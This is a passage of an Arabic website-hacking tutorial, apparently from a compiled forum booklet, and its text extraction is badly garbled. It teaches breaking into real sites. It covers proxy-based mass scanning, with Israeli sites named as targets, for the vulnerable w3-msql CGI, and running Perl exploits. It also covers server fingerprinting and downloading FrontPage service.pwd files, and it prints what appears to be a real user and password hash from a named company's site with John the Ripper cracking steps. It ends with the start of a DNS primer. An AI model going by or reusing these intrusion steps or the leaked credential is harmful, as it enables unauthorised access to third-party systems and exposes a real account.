‫ـ ‪cgi-‬‬ ‫ﺘ ﻀﺢ ﻃﻠﺒﻨﺎﻟ‬‫ﻗﻊ ‪ ، /http://www.com.il/cgi-bin‬ﯾ‬ ‫وﻫﻮ ﯾﻄﻠﺐ ﻣﻦاﻟﺒ ﺮوﻛﺴﻲأ ﺣ ﻀﺎراﻟﻤﻮ‬


‫ﺘﻲ ﯾﻮﺟﺪ‬ ‫ﻗﻊاﻟ‬ ‫‪، /bin/w3-msql‬ﻓﻲاﻟ ﺤﻘﯿﻘﻪ ﻻ ﻧﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮا ت ﺳﻲ ﺟﻲ آي ‪ ،‬وﻟﻜﻦ ﻧﺒ ﺤﺚ ﻋﻦﻛ ﻞاﻟﻤﻮا‬
‫ﺘﻲ ﺟﻤﻌﻨﺎﻫﺎﻓﻲ ﻣﻠ ﻒﺗﻜﺴ ﺖﻛﻠﻬﺎﺗﺄ ﺧﺬ وا ﺣﺪ‬ ‫ﻗﻊاﻹﺳ ﺮاﺋﻠﯿﻪ ﻣﺜﻼاﻟ‬ ‫ﺘ ﺞ ‪ ، WWWMSQL‬ﯾﻌﻨﻲاﻟﻤﻮا‬ ‫ﺑﻬﺎاﻟﻤﻨ‬
‫ﺛﻢ ﯾ ﺤﻔﻆ‬ ‫وا ﺣﺪ وﺗﺪ ﺧ ﻞﻓﻲاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﺬي ﺻﻤﻤﻨﺎه وﺗ ﺮﺳ ﻞاﻟﻰاﻟﺒ ﺮوﻛﺴﻲﺑ ﺤﺜﺎ ﻋﻦ ‪ cgi-bin/w3-msql‬و‬
‫ﺘﻲﺗﻢإﯾﺠﺎد‬ ‫ﺘﺢاﻟﻤﻠ ﻒ وﻧﺸﻮ فاﻟ‬ ‫ﺛﻢ ﻧﻔ‬
‫ﻗﻊ ‪ ،‬و‬
‫ﺘﻬﻲ ﻣﻦﻛ ﻞاﻟﻤﻮا‬ ‫ﺘﻰ ﻧﻨ‬‫رداﻟﺒ ﺮوﻛﺴﻲﻓﻲ ﻣﻠ ﻒ ﺧﺎرﺟﻲ ‪ ،‬وﻫﻜﺬا ﺣ‬
‫ﺘﻮﺟﻪاﻟﻰ ﺳﯿﻜﯿﻮرﺗﻲﻓﻮﻛ ﺲ واﻻ ﺳﯿﻜﯿﻮرﺗﻲﺗﯿﻢ واﻻأي‬ ‫ﺘﻲﻟﻢ ﯾﻮﺟﺪ ‪ ،‬وﻧ‬ ‫ﺘ ﺞ ‪ WWWMSQL‬دا ﺧﻬﺎ واﻟ‬ ‫اﻟﻤﻨ‬
‫ـ ‪ w3-msql‬ﯾﻤﻜﻦﺗﻄﺒﯿﻘﻪ‬ ‫ﻗﻊ ﯾﻌﺠﺒﻚ واﺑ ﺤﺚ ﻋﻦ ‪ ، w3-msql‬ﻣﺜﻼﻓﻲ ﺳﯿﻜﻮﺗﻲﺗﯿﻢ ﻧﺠﺪ ‪Exploit‬ﻟ‬ ‫ﻣﻮ‬
‫ﺘﺼﻔﺢ ‪ ،‬وﻫﻮ ﻫﻨﺎ‬‫ﻣﻦاﻟﻤ‬
‫‪http://www.securiteam.com/exploits/2WUQBRFS3A.html‬‬

‫‪١٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘ ﺮا ق ﻋﺸﻮاﺋﻲ ‪،‬‬ ‫ﺘ ﺞﻓﯿﻬﺎأﺳﻤﯿﻬﺎاﻧﺎ ‪ Random Hacking‬ﯾﻌﻨﻲإ ﺧ‬ ‫ﻗﻊﺑ ﺤﺜﺎ ﻋﻦ ﻣﻨ‬


‫ﻃ ﺮﯾﻘﻪﻓ ﺤ ﺺ ﻋﺪه ﻣﻮا‬
‫ﻗﻮ لﻟﻚﺑﺄﻧﻚ ﻣﺎ را حﺗﻠﻘﻰﻛﺜﯿ ﺮأوﻟﻦﺗﺠﺪ‬ ‫ﻗﻊاﻹﺳ ﺮاﺋﻠﯿﻪﻓﺄﻧﺎأ‬ ‫وﻟﻜﻦﻟﻮﻓﻌﻼﺑ ﺤﺜ ﺖ ﻋﻦ ‪w3-msql‬ﻓﻲاﻟﻤﻮا‬
‫ﺘﻢ ﺣﻔﻆﻛ ﻞ‬ ‫ﺘﻲﻓﯿﻬﺎﻓ ﺮوﻧ ﺖﺑﯿ ﺞ ‪ ،‬و ﻃﺒﻌﺎﺑﻌﺪ ﻣﺎ ﯾ‬ ‫ﻗﻊاﻟ‬ ‫ﺘ ﺮ ﺻﺪﻛ ﻞاﻟﻤﻮا‬
‫ﺷﺊ ‪ ،‬ﻣﻤﻜﻦﺗﺒ ﺤﺚ ﻋﻦ ‪/vti_pvt_/‬ﻟ‬
‫ﺘ ﺮﺟﻌﻪ ﻣﻦاﻟﺒ ﺮوﻛﺴﻲﺗﻜﻮنﺑﺸﻜ ﻞ ‪ HTML‬ﻋﺸﺎنﻛﺬاأﻧ ﺖ ﺧ ﻞاﻟﻤﻠ ﻒ ﯾﻜﻮنﺑﻨﺴ ﻖ *‪html.‬‬ ‫اﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﺴ‬
‫ﺘﺐ ﻋﻨﻬﺎ ‪ The page cannot be displayed..‬واﻟﻠﻲ‬ ‫ﻗﻊ ‪،‬اﻟﻠﻲﻛ‬‫ﺘ ﺤﻪ وﺗﺠﺪﻛ ﻞاﻟﻤﻮا‬‫واﻓ‬
‫‪ Forbddien‬واﻟﻠﻲ ‪.... not found....‬اﻟ ﺦ ‪ ،‬ﻣﻦ ﻫﺬهاﻟ ﺮدودﺗﻌ ﺮ فاﻟﻠﻲ ﻧ ﺖﻓﺎوﻧﺪ واﻻ ﻣﻮﺟﻮد وﻟﻜﻦ‬
‫ﻗﻲ ﻋﻠﯿﻚ‬ ‫ﻏﯿ ﺮ ﻣﺴﻤﻮ حﺑﺎﻟﻮﺻﻮ لﻟﻪ ‪..‬اﻟ ﺦﺑﻬﺬهاﻟﻄ ﺮﯾﻘﻪﺗﻌ ﺮ فاﻟﻠﻲ ﻣﻮﺟﻮد ﻋﻠﯿﻪ واﻟﻠﻲ ﻣﻮ ﻣﻮﺟﻮد ‪.....‬واﻟﺒﺎ‬

‫ﺘﻐ ﻞايﺛﻐ ﺮهﺑﻌﺪاﻟ ﺤﺼﻮ ل ﻋﻠﯿﻬﺎ؟؟‬


‫‪-‬ﻛﯿ ﻒﺗﺴ‬

‫إذاﻛﺎﻧ ﺖ ‪ url‬ﻣﺎ ﯾﺒﻐﺎﻟﻬﺎﻓﻠﺴﻔﻪ ‪،‬ﻛﻮد ‪ c‬وﻣﺎ ﻋ ﺮﻓ ﺖﺗﺸﻐﻠﻪأوﻗﺎﺑﻠ ﺖﻓﯿﻪأ ﺧﻄﺎ ءﻓﻤﻤﻜﻦﺗﺒ ﺤﺚ ﻋﻦﻓ ﺮﺟﻮن‬
‫ﺛﻨﺎ ﻋﻨﻬﺎﻓﻲﻛﻮﻛﺐ‬ ‫ـﻪ وﻟﻜﻦﺑﻠﻐﻪ ‪perl‬أو ‪ Shell *.sh‬وﻫﻮاﻟﺬي ﯾﻘﺎﺑ ﻞ ‪Batch‬ﻓﻲ وﯾﻨﺪوز وﺗ ﺤﺪ‬ ‫ﺛﺎﻧﻲﻟ‬
‫ـ ‪exploit‬ﺑﻠﻐﻪ‬ ‫ﺘﺐ ‪perl exploit.pl‬إذاﻛﺎناﻟ‬ ‫ﺘﯿ ﻒﺑﯿ ﺮ لأﻛ‬ ‫ﻟﻐﺎ تاﻟﺒ ﺮﻣﺠﻪ ‪ ،‬ﻣﻦاﻟﺪوسﺑﻌﺪ ﻣﺎﺗﺜﺒ ﺖأﻛ‬
‫ﺘﻌﻠﯿﻘﺎ ت ‪(:‬‬‫ﺘﻮﺑﻪﺑﯿﻦ ﻋﻼﻣﺎ تاﻟ‬ ‫ﺑﯿ ﺮ ل وﻟﻜﻦ ﻃﺒﻌﺎﻓﯿﻪأﺷﯿﺎ ءﺗﻐﯿﯿ ﺮﻫﺎﻓﻲاﻟﻜﻮد ﻧﻔﺴﻪ ‪ ،‬وﻫﺬهاﻷﺷﯿﺎ ءﺗﻜﻮن ﻣﻜ‬
‫ﺘﻮاﺟﻪ ﻣﺸﺎﻛ ﻞإذا ﻣﺎﺗﻌ ﺮ ف ﺷﺊﻓﻲﺑﯿ ﺮ ل ‪،‬ﻓﻲ ﻫﺬهاﻟﻨﺎ ﺣﯿﻪ ﻻﺗﻄﻠﺐ ﺷ ﺮ حﺑﺎﻟﺼﻮر ‪(:‬إذا رﺟﻊﻟﻚ رد‬ ‫وأﻛﯿﺪﺑ‬
‫ﺛﻢ ﻣﺴﺎﻓﻪ وإﺳﻢاﻟﻤﻠ ﻒ ﻣﺜﻼ ‪perl‬‬ ‫ﻃﻮﯾ ﻞ ﻣﺎﻗﺪر تﺗﻘ ﺮاه ﻣﻤﻜﻦﺗ ﺤﻔﻆاﻟﺨ ﺮج ﻋﻦ ﻃ ﺮﯾ ﻖ ﻋﻼﻣﺔ > و‬
‫‪exploit.pl > log.htm‬‬
‫ﺘﺐﻓﻲاﻹ ﺻﺪارأرﺑﻌﻪ‬ ‫ـ ‪Exploit‬ﻛ‬ ‫ﺘﯿ ﻒﺑﯿ ﺮ لﻓﻘﻂﺗﻮاﺟﻪﻓﯿﻪ ﻣﺸﺎﻛ ﻞ ‪،‬ﻷنﺑﻌ ﺾاﻟ‬ ‫ﺘ ﺞأﻛ‬
‫وﺑﺎﻟﻨﺴﺒﻪﻟﻠﻤﻨ‬
‫ﺘﻐﯿ ﺮاﻟﻤﻔﺴ ﺮ ﻋﻨﺪكأوﺗﻌﺪ لﻓﻲاﻟﻜﻮد‬ ‫ﺘﺎﯾ ﻒﺑﯿ ﺮ لﻟﺬﻟﻚﻗﺪﺗ ﻀﻄ ﺮﻟ‬ ‫وﻣﻤﻜﻦ ﺧﻤﺴﻪ وﻣﻤﻜﻦ ﻣﺎ ﯾﻌﻤ ﻞ زﯾﻦﻓﻲأﻛ‬
‫ﺘﺎز‬‫وﻫﺬاﻛﻠﻪ ﯾﻄﻠﺐ ﺧﺒ ﺮهﻓﻲاﻟﻠﻐﻪ ‪ ،‬وﻋﻠﻰﻓﻜ ﺮهﻟﯿﻮﻧﻜ ﺲ )أﻋﻤ ﻞ ﻋﻠﻰ ‪( RedHat 6.2‬ﻓﯿﻪ ﻣﻔﺴ ﺮﺑﯿ ﺮ ل ﻣﻤ‬
‫ﺘﯿ ﻒﺑﯿ ﺮ لﺑﻌﺸ ﺮا تاﻟﻤ ﺮا ت‪...‬‬
‫ﺟﺪااﻓ ﻀ ﻞ ﻣﻦأﻛ‬

‫‪١١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﻟﻄﺮﯾﻘﺔ اﻟﺼﺤﯿﺤﺔ واﳌﺜﻠﻰ ﰲ اﺧﱰاق اﳌﻮاﻗﻊ "‬

‫‪$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪marwan911:‬‬
‫‪$$$$$$$$$$$$$$$$‬‬
‫‪...‬‬

‫ﺘ ﺮا ق واﻟﻠﻲ ﻫﻲا ﺧﺬاﻟﻤﻌﻠﻮﻣﺎ ت‬


‫ﺎو ل ﺧﻄﻮةﻓﻲاﻻ ﺧ‬
‫ﻗﻊاﻟﻔﻼﻧﻲ ﺷﻨﻬﻮاﻟﻤﻠﻘﻢاﻟﻠﻲ ﺷﻐﺎ ل ﻋﻠﯿﻪ واﻟﻨﻈﺎم واﻟﺨﺪﻣﺎ تاﻟﻠﻲ ﯾﺪﻋﻤﻬﺎ‪.‬‬ ‫ﯾﻌﻨﻲ ﻧﻌ ﺮ فاﻟﻤﻮ‬
‫ﺛﻨﯿﻦ ‪::‬‬‫اﻟﻤﻠﻘﻤﺎ تاﺷﻬ ﺮﻫﺎا‬

‫ﻗﻊﻗﻠﯿ ﻞ ﻣﻘﻔﻠﺔﺛﻐ ﺮاﺗﻬﺎ(‬


‫‪ :IIS‬ﻣﻦ ﻣﺎﯾﻜ ﺮوﺳﻮﻓ ﺖ وﻫﺬه ﻣﻠﯿﺎﻧﺔﺛﻐ ﺮا ت‪) .‬وﻣﻮا‬

‫ﻗﻬﺎ ﺷﺒﻪ ﺻﻌﺐ‪.‬‬


‫ﺘ ﺮا‬
‫ﺘﻮزﻋﯿﻦﻓﻲاﻧ ﺤﺎ ءاﻟﻌﺎﻟﻢ وا ﺧ‬
‫‪ :apache‬ﻣﻦ ﻣﺠﻤﻮﻋﺔ ﻣﺒ ﺮﻣﺠﯿﻦ ﻣ‬

‫ﻃﯿﺐ‬
‫ﻗﻊ‬
‫اﻟ ﺤﯿﻦ ﻋﻨﺪﻧﺎ ﻣﻮ‬

‫ﺘﺸﻐﯿ ﻞ واﻟﻤﻠﻘﻢ واﻟﺨﺪﻣﺎ ت واﻟﻤﻌﻠﻮﻣﺎ تﻛﻠﻬﺎ‬


‫وﺷﻠﻮن ﻧﻌ ﺮ ف ﻧﻈﺎماﻟ‬

‫ﻗﻊ ‪http://www.netcraft.net‬‬
‫ﻋﻨﺪكاﻟﻤﻮ‬

‫اد ﺧﻠﻪ‬

‫ﻗﻲ ﻣ ﺮﺑﻊ‬
‫ﺗﻼ‬

‫ﻗﻊاﻟﻠﻲﺗﺒﻲﺗﻌ ﺮ فاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻠﻲﻓﻮ ق‬


‫ﻫﻨﺎﺗ ﺤﻂﻓﯿﻪاﻟﻤﻮ‬

‫ﻗﻊاﻟﺒﯿ ﺖاﻻﺑﯿ ﺾاﻟﻠﻲ ﻫﻮ ‪whitehouse.org‬‬


‫ﻣﺜﻼ ﻧ ﺤﻂ ﻣﻮ‬

‫ﺘﺒﻪ ﻣﻦ ﻏﯿ ﺮ ‪ //:http‬وﻻ ‪/‬اﻟﻠﻲﺑﺎﻻ ﺧﯿ ﺮ‬


‫ﻣﻼ ﺣﻈﺔ‪ :‬ﻧﻜ‬

‫‪http://uptime.netcraft.com/up/graph....whitehouse.org‬‬

‫ﺘﺎﻟﻲ‬
‫را ح ﯾﻄﻠﻊﻟﻨﺎاﻟ‬

‫‪The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows‬‬


‫‪2000‬‬
‫ﻃﯿﺐ‬

‫ﺘﯿﻦ‬
‫ﺘﯿﻦ ﻣﻬﻤ‬
‫اﻟ ﺤﯿﻦ ﻋ ﺮﻓﻨﺎ ﻣﻌﻠﻮﻣ‬

‫‪١٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺎو ل ﺷﻲ ءاﻧﻪ ﺷﻐﺎ ل ﻋﻠﻰاﻟﻤﻠﻘﻢ ‪IIS5.0‬‬

‫ﺛﺎﻧﻲ ﺷﻲ ء ﺷﻐﺎ ل ﻋﻠﻰ ﻧﻈﺎم وﯾﻨﺪوز ‪٢٠٠٠‬‬

‫ﺣﻠﻮ‬

‫او ل ﺷﻲ ء ﻧﺠ ﺮبﺛﻐ ﺮا ت ‪ IIS5.0‬ﻋﻠﯿﻪ )را حا ﺣﻄﻬﺎﺑﻌﺪاﻟﻤﻮ ﺿﻮ ع(إذا ﻣﺎﻧﻔﻊ ﺷﻲ ء ﻧﺸﻮ فﺛﻐ ﺮا ت ﻧﻈﺎم‬
‫ﻗﻊﺑﻌﺪاﻟﻤﻮ ﺿﻮ ع(‬ ‫وﯾﻨﺪوز ‪) ٢٠٠٠‬را حا ﺣﻂاﻟﻤﻮ‬

‫ﺘﺼﻔﺢ‬ ‫ﺘ ﺮ قﻓﯿﻬﺎ ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻤ‬


‫ﻃﯿﺐ ‪.....‬اﻟ ﺤﯿﻦﻓﯿﻪ ﺣﺎﺟﺔاﺳﻤﻬﺎ ﯾﻮﻧﻲﻛﻮد ‪......‬ﻫﺬهﺗﺨ‬
‫ﻗﻊ‪ .‬را حا ﺣﻂاﻣﺜﻠﺔ‬
‫وﻣﺎﺗﻤﺸﻲإﻻ ﻣﻊ ﻣﻠﻘﻤﺎ ت ‪ IIS‬وﻫﻲ ﻋﺒﺎرة ﻋﻦ ﻋﻨﺎوﯾﻦ ﻃﻮﯾﻠﺔﺗ ﺤﻄﻬﺎﺑﻌﺪ ﻋﻨﻮاناﻟﻤﻮ‬
‫ﻋﻠﯿﻬﺎ‪.‬‬
‫ﻃﯿﺐﻟﻨﻔ ﺮ ضاﻧﻪ ﻣﺎ ﻃﻠﻊﻓﯿﻬﺎﺛﻐ ﺮا ت؟‬
‫ﻗﻊ ﻧﻔﺴﻪ‬‫ﺘﻮﯾﺎ تاﻟﻤﻮ‬‫ﻧﺸﻮ ف ﻣ ﺤ‬

‫ﻗﻊاﻟﻠﻲ را حارﻓﻘﻪﻓﻲاﻟ ﺮداﻟﻠﻲ‬


‫ﺘﺪىاواواو وﻧﻄﻠﻊﺛﻐ ﺮاﺗﻬﺎ ﻣﻦاﻟﻤﻮ‬
‫ﻧﺸﻮ فإنﻛﺎن ﻋﻨﺪه ﺳﺠ ﻞ زواراو ﻣﻨ‬
‫ﺑﻌﺪاﻟﻤﻮ ﺿﻮ ع‪.‬‬

‫ﻃﯿﺐﻟﻮﻛﺎناﻟﺴﯿ ﺮﻓ ﺮاﺑﺎﺗﺸﻲ؟‬

‫ﻗﻊاراﻧﻚ ‪arank.com.www‬‬
‫ﺧﻠﻮﻧﺎ ﻧﺎ ﺧﺬ ﻣﺜﺎ ل ﻣﻮ‬

‫ﺘﺎﻟﯿﺔ‬
‫ﺘﯿﺠﺔاﻟ‬
‫ﻟﻮ ﺣﻠﻠﻨﺎهﺑﺎﻟﻨﯿ ﺖﻛ ﺮاﻓ ﺖ را ح ﻧﺸﻮ فاﻟﻨ‬

‫)‪The site www.arank.com is running Apache/1.3.20 (Unix‬‬


‫‪mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6‬‬
‫‪mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6‬‬
‫‪on Linux‬‬

‫ﻃﯿﺐ ﻫﻨﺎ ﯾﻬﻤﻨﺎﺛﻼ ثاﺷﯿﺎ ء‬

‫اﻟ ﻤﻠﻘﻢ وﻫﻮ ‪ apache 1.3.20‬و دﻋﻢﻓ ﺮوﻧ ﺖﺑﯿ ﺞ ‪ FrontPage/5.0.2.2510‬وﻫﺬه ﻣﻠﯿﺎﻧﺔﺛﻐ ﺮا ت‬
‫واﻟﺜﺎﻟﺚاﻟﻨﻈﺎم وﻫﻮ ‪Linux‬‬

‫ﻃﯿﺐ‬

‫اﻟﻤﻠﻘﻢ‬

‫ﺘ ﺮا قإﻻﺑﻌ ﺾاﻹ ﺻﺪارا ت ﻣﻨﻬﺎﻓﻨ ﺤﻂﻫﺬه ﻋﻠﻰ ﺟﻨﺐ‪.‬‬


‫او ل ﺷﻲ ءاﺑﺎﺗﺸﻲ ﻣﻦاﻟﻤﻠﻘﻤﺎ تاﻟﺼﻌﺒﺔاﻹ ﺧ‬

‫ﻧﺸﻮ ف دﻋﻢاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ‬

‫‪١٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻠﻨﺎاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ ﻣﻠﯿﺎنﺛﻐ ﺮا ت‬


‫ﺰي ﻣﺎ‬

‫ﺛﻐ ﺮاﺗﻪﻗﻮﯾﺔ وﻛﺜﯿ ﺮةﺗﻘ ﺮﯾﺒﺎ‬


‫و‬

‫ﺘﺎﺟﻬﺎ ﻏﯿ ﺮه ﻣﺎﻣﻨﻪﻓﺎﯾﺪة‬
‫ﻣﻨﻬﺎ ﻣﺠﻠﺪ _‪ vti_pvt‬و _‪private‬ﻫﺬهاﻟﻠﻲ ﻧ ﺤ‬

‫ﻗﻲارﺑﻊ ﻣﻠﻔﺎ ت ﻣﻬﻤﺔ وﻫﻲ ‪ service.pwd‬و ‪ users.pwd‬و‬ ‫دا ﺧ ﻞاﻟﻤﺠﻠﺪﯾﻦ را ح ﻧﻼ‬


‫ﺘﺒ ﺮ ﻫﺬاا ﺧﻄ ﺮ ﻣﻠ ﻒ‬
‫‪ authors.pwd‬و ‪ adminstators.pwd‬وﯾﻌ‬

‫ﻗﻊاﻟﻤﻮﺟﻮدة‬
‫ﻃﯿﺐﻟﻮﻗﺪرﻧﺎ ﻧﻨﺰ ل وا ﺣﺪ ﻣﻦاﻟﻤﻠﻔﺎ ت ﻫﺬه )ﻣﻼ ﺣﻈﺔاﻟﺜﻐ ﺮة ﻫﺬه ﻣﻮﺟﻮدة ب ‪ %٧٠‬ﻣﻦاﻟﻤﻮا‬
‫ﻗﻲاﻟﺴﻄ ﺮ ﻫﺬا ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل‬
‫ﺘ ﺤﻬﺎﺑﺎﻟﻤﻔﻜ ﺮة وﻧﻼ‬
‫ﻋﺎﻟﻨ ﺖ(ﻟﻮ ﻧﺰﻟﻨﺎﻫﺎ ﻧﻔ‬
‫‪goodyco:CalXS8USl4TGM‬‬

‫ﻗﻊﻗﻮدي ‪http://www.goody.com.sa/_vti_pvt/service.pwd‬‬
‫وﻫﺬا ﻣﻦ ﻣﻮ‬

‫ﻃﯿﺐاﻟ ﺤﯿﻦ ‪goodyco‬اﻟﯿﻮزر واﻟﺒﺎﺳ ﺲ ﻣﺸﻔ ﺮ واﻟﻠﻲ ﻫﻮ ‪CalXS8USl4TGM‬‬

‫وﺷﻠﻮن ﯾﻨﻔﻚ؟ ﯾﻨﻔﻚﺑﺒ ﺮﻧﺎﻣ ﺞاﺳﻤﻪ ‪john the repaier‬‬

‫ﺘﺐاﻟﺴﻄ ﺮ‬
‫ﺘﺢاﻟﺪوس وﺗ ﺮو حﻟﻤﺠﻠﺪ ﺟﻮﻫﻦ وﺗﻜ‬
‫ﺗﻨﺰﻟﻪ وﺗ ﺤﻂاﻟﻤﻠ ﻒاﻟﻤﺸﻔ ﺮ )ﻣﻊاﻟﯿﻮزر(ﺑﻤﺠﻠﺪ وا ﺣﺪ وﺗﻔ‬
‫ﺘﺎﻟﻲ ‪john -i PASSWORD.FILE‬‬ ‫اﻟ‬

‫ﺘﻨﺎه ﯾﻄﻠﻊﻟﻚاﻟﺒﺎﺳ ﺲ‬
‫وﻋﺎداﺳ‬

‫ﻃﯿﺐ ﻧ ﺮو حﻟﻠﻔﻘ ﺮةاﻟﺜﺎﻟﺜﺔ واﻟﻠﻲ ﻫﻲاﻟﻨﻈﺎم‬

‫زي ﻣﺎﺷﻔﻨﺎاﻟﻨﻈﺎم ﻫﻮﻟﯿﻨﻜ ﺲ‬

‫ﺛﻐ ﺮا تاﻛﺜ ﺮ‬
‫ﻟﻜﻦﻟﯿﻨﻜ ﺲاﯾ ﺶ؟ﻓﯿﻪ رﯾﺪ ﻫﺎ ت و ﻣﺎﻧﺪرﯾﻚ وﻓﯿﻪ ﻣﻨﻪإﺻﺪار تﻛﺜﯿ ﺮ و‬

‫ﺘﯿﻦ‬
‫ﻟﻜﻦ ﻫﻨﺎ را حﺗﻮاﺟﻬﻚ ﻣﺸﻜﻠ‬

‫ﻗﻊ ﯾﻄﻠﻊﻟﻚاﻟﻨﻈﺎمﻓﻮ ق‬
‫ﺘﺐ ﻋﻨﻮاناﻟﻤﻮ‬
‫او ل ﺷﻲ ء ﻣﻌ ﺮﻓﺔاﻟﻨﻈﺎمﺗﻘﺪرﺗﻄﻠﻌﻪ ﻣﻦاﺑﺪا وﺗﺸﻐﯿ ﻞ و ل ‪ telnet‬واﻛ‬
‫ﻧﻮﻋﻪ وإﺻﺪارﺗﻪ‬

‫اﻟﻤﺸﻜﻠﺔاﻟﺜﺎﻧﯿﺔ ﻻزم ﯾﻜﻮن ﻋﻨﺪكﻟﯿﻨﻜ ﺲاﺻﻼ‬

‫ﺘﻐ ﻞإﻻ ﻋﺎﻟﻠﯿﻨﻜ ﺲﻓﻘﻂ‬


‫ﻋﻠﺸﺎنﺛﻐ ﺮاﺗﻪﺑﻠﻐﺔا ل ‪ c‬وﻫﺬه ﻣﺎﺗﺸ‬

‫================‬

‫‪١٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺐ ﻣﺜﻼ )ﻓﻮ قﺑﺎﻟﻤ ﺮﺑﻊاﻟﻠﻲ ﻋﺎﻟﯿﻤﯿﻦ( ‪IIS‬او‬ ‫ﻗﻊ ﻣﻔﯿﺪ ﺟﺪاﺗﻜ‬
‫‪/http://neworder.box.sk‬ﻫﺬااﻟﻤﻮ‬
‫ﺘﺪى وا ﺻﺪارﺗﻪاوايﺑ ﺮﻧﺎﻣ ﺞ وﯾﻄﻠﻊﻟﻚﺛﻐ ﺮاﺗﻪ‬
‫‪apache‬او ﻣﻨ‬

‫ًﺗ ﺮو ح ل ‪EXPLOITS‬اﻟﻠﻲ ﻋﺎﻟﯿﺴﺎر‬ ‫ً ﺟﺪا‬


‫ﻗﻊ ﻫﺬا ﺧﻄﯿ ﺮ ﺟﺪا‬
‫‪/http://www.ussrback.com‬اﻟﻤﻮ‬
‫ﺘﯿﺎر ﻫﻨﺎﺛﻐ ﺮا ت ﺟﻤﯿﻊاﻻﻧﻈﻤﺔ ﻣﻦﻟﯿﻨﻜ ﺲ و وﯾﻨﺪوز و و واﻟ ﺦ‪ ..‬وﻣﻨﻮﻋﺔ ﻣﻦ ‪ c‬و ‪ perl‬و‬
‫ﺘﺎراو لا ﺧ‬‫وﺗﺨ‬
‫ﯾﻮﻧﻲﻛﻮد‪...‬‬

‫‪١٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻣﻌﻠﻮﻣﺎت ﻋﻦ اﻟـ ‪" DNS‬‬

‫‪$$$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪ACID BURN_EG :‬‬
‫‪$$$$$$$$$$$$$$$$$$$‬‬

‫ـ ‪ DNS‬؟؟؟‬
‫ﻣﺎ ﻫﻮاﻟ‬
‫==============‬
‫ﺘﺼ ﻞ ﺳ ﺮﻓ ﺮا ل ‪ DNS‬ﻋﺎدة ﻋﻠﻰﺑﻮر ت‬
‫ﺘﺼﺎرﻟﻜﻠﻤﻪ ‪ Domain Name System‬ﻮ ﯾ‬‫‪: DNS‬ﻫﻮا ﺧ‬
‫ﺘﺼ ﻞﺑﻪ ﻋﻦ‬ ‫ﻗﻊﻓﺴﻮ فﺗ‬ ‫ﺘﻌﻤﻠ ﺖا ل ‪DNS‬ﻟﻬﺬااﻟﻤﻮ‬ ‫ﻗﻊ واﺳ‬ ‫‪ ٥٣‬ﻣﻤﺎ ﯾﻌﻨﻰاﻧﻚاذاارد تاﻻﺗﺼﺎ لﻷ ﺣﺪاﻟﻤﻮا‬
‫ﺘ ﺮﺟﻢاو ﯾ ﺤﻮ لا ل ‪ translates alphabetical hostnames‬ﻮ ﯾﻌﻨﻰ‬ ‫ﻃ ﺮﯾ ﻖاﻟﺒﻮر ت ‪ ٥٣‬و ﺳﻮ ف ﯾ‬
‫ﻗﻊ ﻣﺜ ﻞ ‪ http://www .3asfh.com/ :‬ﺎﻟﻰ ‪ IP ADRESSES‬ﻣﺜ ﻞ ‪,١١١٫١١١٫١١١‬‬ ‫اﺳﻢاﻟﻤﻮ‬
‫ﺘ ﺤﻮﯾ ﻞ ﻫﺬهﺗﺴﻤﻰ‬ ‫ﻗﻊ ﻣﺒﺎﺷ ﺮه و ﻋﻤﻠﯿﻪاﻟ‬ ‫ﺘﺼ ﻞﺑﺎﻟﻤﻮ‬ ‫ﺘﻢاﻟﻌﻤﻠﯿﻪﺗ‬‫‪ ١١١‬واﻟﻌﻜ ﺲ ﺻ ﺤﯿﺢ و ﻋﻨﺪﻣﺎﺗ‬
‫ﺘﻄﯿﻊاﻻﺗﺼﺎ لﺑﻪ ‪ ،‬و‬ ‫ﻗﻊ ﺎﻟﻰ ‪ IP‬ﺎواﻟﻌﻜ ﺲﻟﻨﺴ‬ ‫‪address resolution‬ﺎىﺗ ﺤﻮﯾ ﻞاوﺗ ﺤﻠﯿ ﻞ ﻋﻨﻮاناﻟﻤﻮ‬
‫ﻗﺒ ﻞ ﻇﻬﻮرا ل ‪DNS‬ﻛﺎناﺳﻢا ﺧ ﺮﻟﻌﻤﻠﯿﻪا ل‪ address resolution .‬ﻮﻟﻜﻦﻗﺪ ﻇﻬ ﺮا ل ‪ DNS‬ﻟﺠﻌ ﻞ‬
‫ﻗﻊ و ﺣﻔﻈﻬﺎاﻛﺜ ﺮ ﺳﻬﻮﻟﺔ وﻣ ﺮوﻧﺔ ﻣﻦ ذيﻗﺒ ﻞ ﺣﯿﺚﻗﺒ ﻞ ﻇﻬﻮر ﻫﺬهاﻟﺨﺪﻣﺔﻓﺎﻧﻚﻟﻠﺪ ﺧﻮ ل‬ ‫ﺗﺬﻛ ﺮ ﻋﻨﺎوﯾﻦاﻟﻤﻮا‬
